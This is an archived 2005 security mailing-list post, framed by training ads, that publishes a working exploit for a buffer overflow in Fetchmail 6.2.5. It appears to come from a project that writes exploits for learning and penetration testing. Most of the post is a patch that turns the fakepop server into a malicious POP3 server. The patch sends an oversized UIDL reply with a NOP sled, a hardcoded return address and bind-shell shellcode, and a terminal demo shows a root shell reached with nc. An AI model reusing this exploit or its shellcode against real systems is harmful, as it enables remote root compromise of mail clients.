Ethical Hacking Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package. | Computer Forensics Training at InfoSec Institute Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors. |

| Subject: | Fetchmail 6.2.5 exploit for Bugtraq ID: 14349 |
|---|---|
| Date: | 30 Aug 2005 16:02:03 -0000 |
The following exploit is brought to you by The Mantis Project which is a project geared towards learning the process of discovering and exploiting bugs in the wild. Exploits are based on published advisories which do not contain proof of concept code or unpublished findings. The project's purpose is to get a better understanding of wild bugs and the process of exploiting them while providing a resource to the community particularly penetration testers. So if you are interested in exploit development or just want to learn more about it feel free to join us on irc.pulltheplug.org #mantis or the mailing list at http://pulltheplug.org/cgi-bin/mailman/listinfo/mantis. Special thanks to PullThePlug for hosting the project. -------------------[exploit]------------------- This patch is for fakepop version 7. fakepop is a fake pop3 server which is normally used to inform users of misconfigured clients. Note: fakepop is ran by inetd example: <---+in terminal 1+---> farenhiet:/home/bannedit/fetchmail-6.2.5# /usr/local/bin/fetchmail -p pop3 --fastuidl 1 localhost fetchmail: removing stale lockfile Enter password for root@localhost: UIDL 2 <---+in terminal 2+---> farenhiet:/home/bannedit/exploit# perl -e '$|++;while (<>) { print . "\n\x00"; }' | nc localhost 20000 id uid=0(root) gid=0(root) groups=0(root) <----+patch for fakepop-7+---> --- fakepop-7/fakepop.c 2004-12-01 12:13:02.000000000 -0500 +++ fakepop.c 2005-08-29 18:45:01.096792176 -0400 @@ -29,7 +29,12 @@ if (strcasecmp ("stat", cmd) == 0) { known = 1; - printf("+OK %d %d\r\n", msg_gettotalmsgs(), msg_gettotalsize()); + printf("+OK 8 %d\r\n", msg_gettotalsize()); + } + + if(strcasecmp("last", cmd) == 0){ + known = 1; + printf("-ERR 1\r\n"); } if (strncasecmp ("list", cmd, 4) == 0) { @@ -56,25 +61,17 @@ } if (strncasecmp ("uidl", cmd, 4) == 0) { - char s[71]; - int i; - known = 1; - if (strlen(cmd) > 5) { - /* single message uidl */ - i = atoi(cmd+5); - id_get_uidl (i, s); - printf("+OK %d %s\r\n",i,s); - } else { - /* all messages uidl */ - int j; - j = msg_gettotalmsgs(); - printf("+OK\r\n"); - for (i = 1; i <= j; i++) { - id_get_uidl (i, s); - printf("%d %s\r\n",i,s); - } - printf(".\r\n"); - } + known=1; + + char s[177]; //177 + long addy=0xbfffd702; + int i=atoi(cmd+5); + + memset(s, 0x90, sizeof(s)); + *(long*)&s[sizeof(s)-5]=addy; + s[sizeof(s)-1]='\0'; + + printf("+OK %d %s\r\n",i+1,s); } if (strncasecmp ("retr", cmd, 4) == 0) { @@ -122,8 +119,21 @@ msg_init(); - printf ("+OK fakepop V%s %s <1234.5678901234@fakepop.invalid>\r\n", - PROGRAM_VERSION, URL); + char sc[]= + "\x31\xdb\x31\xc9\xf7\xe3" + "\x31\xdb\xf7\xe3\xb0\x66\x53\x43\x53\x43\x53\x89\xe1\x4b" + "\xcd\x80\x89\xc7\x52\x66\x68\x4e\x20\x43\x66\x53\x89\xe1" + "\xb0\xef\xf6\xd0\x50\x51\x57\x89\xe1\xb0\x66\xcd\x80\xb0" + "\x66\x43\x43\xcd\x80\x50\x50\x57\x89\xe1\x43\xb0\x66\xcd" + "\x80\x89\xd9\x89\xc3\xb0\x3f\x49\xcd\x80\x41\xe2\xf8\x51" + "\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x51\x53" + "\x89\xe1\xb0\xf4\xf6\xd0\xcd\x80"; + +char buff[strlen(sc)+100]; +memset(buff, 0x90, sizeof(buff)); +memcpy(&buff[sizeof(buff)-strlen(sc)], sc, strlen(sc)); + printf ("+OK fakepop V%s %s %s <1234.5678901234@fakepop.invalid>\r\n", + PROGRAM_VERSION, URL, sc); fflush(stdout); while ((running == 1) && (fgets(cmd, CMD_MAX_SIZE, stdin) != NULL)) {
| <Prev in Thread] | Current Thread | [Next in Thread> |
|---|---|---|
| ||
| Previous by Date: | Re: ICMP attacks against TCP: Conclusions, Dan Yefimov |
|---|---|
| Next by Date: | Re: PunBB BBCode IMG Tag Script Injection Vulnerability, Aaron Horst |
| Previous by Thread: | phpLDAPadmin 0.9.6 - 0.9.7/alpha5 (possibly prior versions) system disclosure,, retrogod |
| Next by Thread: | MS05-042 Security Update Problems, Andrew McCullough |
| Indexes: | [Date] [Thread] [Top] [All Lists] |